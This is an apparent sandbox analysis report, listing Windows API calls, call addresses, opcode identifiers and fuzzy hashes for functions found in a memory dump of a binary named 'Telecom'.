                                                      • Instruction ID: c002c42aab04dd2bc5415dd19a8f6f70cf6fcee3916c597f07daaa9bf93737ec
                                                      • Opcode Fuzzy Hash: f52d5065911cef5f74b2ec5a7533c080deedea07c8b795d0931f28286ac610e4
                                                      • Instruction Fuzzy Hash: 15014B31901115FFDB506F64DC08BEE7BB5FB08721F500572F91AA21A0CB311E52AB55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004A21CC
                                                      • UnloadUserProfile.USERENV(?,?), ref: 004A21D8
                                                      • CloseHandle.KERNEL32(?), ref: 004A21E1
                                                      • CloseHandle.KERNEL32(?), ref: 004A21E9
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 004A21F2
                                                      • HeapFree.KERNEL32(00000000), ref: 004A21F9
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                      • String ID:
                                                      • API String ID: 146765662-0
                                                      • Opcode ID: 0fc9ed474b5b631eb5f406c93da539a313b82c055ccea84a833b523a813fe108
                                                      • Instruction ID: f01e6b970cd6f4e1a01b8bb2e34b4d37b8dca42d5cdd3654646e786972ba87af
                                                      • Opcode Fuzzy Hash: 0fc9ed474b5b631eb5f406c93da539a313b82c055ccea84a833b523a813fe108
                                                      • Instruction Fuzzy Hash: 18E01A76405105FFDB012FA1EC0CD0ABF39FF49322B104232F22582070CB329420DB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004D48D1
                                                      • IsMenu.USER32(?), ref: 004D48E6
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004D492E
                                                      • DrawMenuBar.USER32 ref: 004D4941
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$DrawInfoInsert
                                                      • String ID: 0
                                                      • API String ID: 3076010158-4108050209
                                                      • Opcode ID: 8a597df269797a4fac52e21e7323cc4611dfcd37c66e20a014577a274151f3ce
                                                      • Instruction ID: 5ed67f1d6df81e6abc4edc483bd73f0070ee3d3e37d31c8f36706136826e3fd6
                                                      • Opcode Fuzzy Hash: 8a597df269797a4fac52e21e7323cc4611dfcd37c66e20a014577a274151f3ce
                                                      • Instruction Fuzzy Hash: F3417BB4A01209EFDB10CF62D8A4AAB7BB5FF45324F04416BF94597350C334AD54CB68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333
                                                        • Part of subcall function 004A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 004A4620
                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 004A27B3
                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 004A27C6
                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 004A27F6
                                                        • Part of subcall function 00448577: _wcslen.LIBCMT ref: 0044858A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_wcslen$ClassName
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 2081771294-1403004172
                                                      • Opcode ID: d0a0ccfa156f6ad59aa5bc81aa993ce375686e7ba0221e9a39a40a3a8533c359
                                                      • Instruction ID: e9f88fcc34f655ad4c491578a8354ddbcb50fff42bc760b03f9ac5748b3dcf37
                                                      • Opcode Fuzzy Hash: d0a0ccfa156f6ad59aa5bc81aa993ce375686e7ba0221e9a39a40a3a8533c359
                                                      • Instruction Fuzzy Hash: CD212675D00104BEDB04AB65D845CFFBB78DF56364F10422FF421A72E0CB7C490A9A68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0046508E,?,?,0046502E,?,005098D8,0000000C,00465185,?,00000002), ref: 004650FD
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00465110
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,0046508E,?,?,0046502E,?,005098D8,0000000C,00465185,?,00000002,00000000), ref: 00465133
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 2d3f1fbe62774625d3db243346dab3df9adced1898eab1f98dd9a87cd9b49583
                                                      • Instruction ID: 8af006d6ac8dfc47d2fb911e9109991bc4718f6235211398b3d96957094c160d
                                                      • Opcode Fuzzy Hash: 2d3f1fbe62774625d3db243346dab3df9adced1898eab1f98dd9a87cd9b49583
                                                      • Instruction Fuzzy Hash: B7F0C834D41208BBDB115F95DC09BDEBFB4EF05712F000066F805A2260DB385D80DA99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0044668B,?,?,004462FA,?,00000001,?,?,00000000), ref: 0044664A
                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0044665C
                                                      • FreeLibrary.KERNEL32(00000000,?,?,0044668B,?,?,004462FA,?,00000001,?,?,00000000), ref: 0044666E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                      • API String ID: 145871493-3689287502
                                                      • Opcode ID: 782bb2d50b0ce1e54b93c4b04cf21f66694d27ae7afdf6ad4c3cb34bb843893b
                                                      • Instruction ID: f65af6163673cca1b881ed09edbb7c853577afbab6203663a2bea5604f3e4f43
                                                      • Opcode Fuzzy Hash: 782bb2d50b0ce1e54b93c4b04cf21f66694d27ae7afdf6ad4c3cb34bb843893b
                                                      • Instruction Fuzzy Hash: 5AE0E635A0262257A2211725AC08B5F6668DF93F16B070227FD04E2358DB58CD0185AD
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00485657,?,?,004462FA,?,00000001,?,?,00000000), ref: 00446610
                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00446622
                                                      • FreeLibrary.KERNEL32(00000000,?,?,00485657,?,?,004462FA,?,00000001,?,?,00000000), ref: 00446635
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                      • API String ID: 145871493-1355242751
                                                      • Opcode ID: c137cf81aa46628b8016218ea0669855af20fc438360dbaa05857da416542c9b
                                                      • Instruction ID: 604165453bd1b44da74cf6f42da3b3d1eae7d8de4db1afceb43c0dd1864e2fa0
                                                      • Opcode Fuzzy Hash: c137cf81aa46628b8016218ea0669855af20fc438360dbaa05857da416542c9b
                                                      • Instruction Fuzzy Hash: 60D01235A1353257523227296C18A8F6B18DE93F113070127B900A2258CF68CD42859D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004B35C4
                                                      • DeleteFileW.KERNEL32(?), ref: 004B3646
                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004B365C
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004B366D
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004B367F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$Copy
                                                      • String ID:
                                                      • API String ID: 3226157194-0
                                                      • Opcode ID: 285c931a5e8b72466577608b1cb7794d0b90d4db0555ccbd2211e559341a0e2c
                                                      • Instruction ID: ceac35c35ccefd5f0cc5e92ec3077c894b59a85e70a56fedc9305e5d2a3eda81
                                                      • Opcode Fuzzy Hash: 285c931a5e8b72466577608b1cb7794d0b90d4db0555ccbd2211e559341a0e2c
                                                      • Instruction Fuzzy Hash: 93B16071D01119ABDF11EFA6CC85EDFBBBCEF49314F0040ABF509A6141EA389B458B65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32 ref: 004CAE87
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004CAE95
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 004CAEC8
                                                      • CloseHandle.KERNEL32(?), ref: 004CB09D
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                      • String ID:
                                                      • API String ID: 3488606520-0
                                                      • Opcode ID: ad51c9fe504937789b7a0c2814b633f373b167f379bc643dbce2a3d715cfe548
                                                      • Instruction ID: 9ae740e2ec67df352d52bb02ac75342ff429ce4b6b1a1092bb82cd87a8f7cd42
                                                      • Opcode Fuzzy Hash: ad51c9fe504937789b7a0c2814b633f373b167f379bc643dbce2a3d715cfe548
                                                      • Instruction Fuzzy Hash: 9BA1B075A00300AFE760DF26C886F2AB7E4AF44714F54881EF9598B392CB75EC41CB86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333
                                                        • Part of subcall function 004CD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004CC10E,?,?), ref: 004CD415
                                                        • Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD451
                                                        • Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD4C8
                                                        • Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD4FE
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004CC505
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004CC560
                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 004CC5C3
                                                      • RegCloseKey.ADVAPI32(?,?), ref: 004CC606
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004CC613
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                      • String ID:
                                                      • API String ID: 826366716-0
                                                      • Opcode ID: 4b009e9d3640011459a8e86b6e05ee8cccb8148894274ab02c72ced9c2f3b48b
                                                      • Instruction ID: 5e15694d06c97c81d0a0801932913d34d0f316bee43e10b3330b048954a835e7
                                                      • Opcode Fuzzy Hash: 4b009e9d3640011459a8e86b6e05ee8cccb8148894274ab02c72ced9c2f3b48b
                                                      • Instruction Fuzzy Hash: 04619D75208241AFD354DF14C890F2ABBE5FF84308F1485AEF4998B292CB35ED46CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004AE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004AD7CD,?), ref: 004AE714
                                                        • Part of subcall function 004AE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004AD7CD,?), ref: 004AE72D
                                                        • Part of subcall function 004AEAB0: GetFileAttributesW.KERNEL32(?,004AD840), ref: 004AEAB1
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 004AED8A
                                                      • MoveFileW.KERNEL32(?,?), ref: 004AEDC3
                                                      • _wcslen.LIBCMT ref: 004AEF02
                                                      • _wcslen.LIBCMT ref: 004AEF1A
                                                      • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 004AEF67
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                      • String ID:
                                                      • API String ID: 3183298772-0
                                                      • Opcode ID: f79d188e4940b2ef505e7b7a27c6382dbd3160e731c5669ed0d730988b85e564
                                                      • Instruction ID: d6195c021bf810813116bf99440fac9cba4abd65fc12a3de07e13b5eda67670f
                                                      • Opcode Fuzzy Hash: f79d188e4940b2ef505e7b7a27c6382dbd3160e731c5669ed0d730988b85e564
                                                      • Instruction Fuzzy Hash: 9F5170B24083859BC724EB92D8819DBB3ECEF95304F00092FF599C3151EF79E688875A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 004A9534
                                                      • VariantClear.OLEAUT32 ref: 004A95A5
                                                      • VariantClear.OLEAUT32 ref: 004A9604
                                                      • VariantClear.OLEAUT32(?), ref: 004A9677
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004A96A2
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType
                                                      • String ID:
                                                      • API String ID: 4136290138-0
                                                      • Opcode ID: 9e3ea44d7ee47ee349874722153f620d1fd6eacd04ac808b0902301663e6f7f3
                                                      • Instruction ID: 63221f52f17fac75f2d8093c8d5427c72e2cc61f0f452095b6c63908ce0db994
                                                      • Opcode Fuzzy Hash: 9e3ea44d7ee47ee349874722153f620d1fd6eacd04ac808b0902301663e6f7f3
                                                      • Instruction Fuzzy Hash: 31513AB5A00619EFCB14CF58C884EAAB7F8FF99314B15856AE905DB310E734E911CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004B95F3
                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 004B961F
                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 004B9677
                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 004B969C
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 004B96A4
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfile$SectionWrite$String
                                                      • String ID:
                                                      • API String ID: 2832842796-0
                                                      • Opcode ID: d63a582e05d28c7701fe5703e4d2b4ef960597d3001836c6dbd7a133c467ecfb
                                                      • Instruction ID: eef543355a1cfe27b8fc053ae8960fca58da57423f32be497f369a1d6adee249
                                                      • Opcode Fuzzy Hash: d63a582e05d28c7701fe5703e4d2b4ef960597d3001836c6dbd7a133c467ecfb
                                                      • Instruction Fuzzy Hash: E9514D35A002159FDB05DF55C881AAEBBF5FF49318F04809AE949AB362CB39ED41CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 004D766B
                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 004D7682
                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 004D76AB
                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,004BB5BE,00000000,00000000), ref: 004D76D0
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 004D76FF
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$MessageSendShow
                                                      • String ID:
                                                      • API String ID: 3688381893-0
                                                      • Opcode ID: c376d341df9eb2f999f6b357ebc602e9aa10fdd75a166b60de6eacc34a159873
                                                      • Instruction ID: a33e6017c3545bb02b50108e253c8077fa885457fcd8319ebd66fc45a31d74ce
                                                      • Opcode Fuzzy Hash: c376d341df9eb2f999f6b357ebc602e9aa10fdd75a166b60de6eacc34a159873
                                                      • Instruction Fuzzy Hash: 0A41E335A08504AFD7248F2CCC68FAA7B65EB05360F150267F914A73E0F774ED51DA58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: be8d7145cbcaa3e8f59e0bc2a49805076113a87d1a36bfe0745d3d2f1804df31
                                                      • Instruction ID: 8bbe52eb40ba4299c962700914884019fe711016b99c572bb259653a5b728804
                                                      • Opcode Fuzzy Hash: be8d7145cbcaa3e8f59e0bc2a49805076113a87d1a36bfe0745d3d2f1804df31
                                                      • Instruction Fuzzy Hash: F341E432A002109FCB20DF78C980A9EB3F1EF89314F15856AE519EB351E775AD01CB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 004A2262
                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 004A230E
                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 004A2316
                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 004A2327
                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 004A232F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleep$RectWindow
                                                      • String ID:
                                                      • API String ID: 3382505437-0
                                                      • Opcode ID: b50b8b6bfcb6d81073c257d437b555397b1e520d6c6258fbdd80f49f685a841e
                                                      • Instruction ID: 9a578452e2f548045e5beed27270b010950b20a28247f407698d25196c0792eb
                                                      • Opcode Fuzzy Hash: b50b8b6bfcb6d81073c257d437b555397b1e520d6c6258fbdd80f49f685a841e
                                                      • Instruction Fuzzy Hash: FE31D172900219EFDB04CFACCE88BDE3BB5EB16315F00426AF921A72D0C3B49940DB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
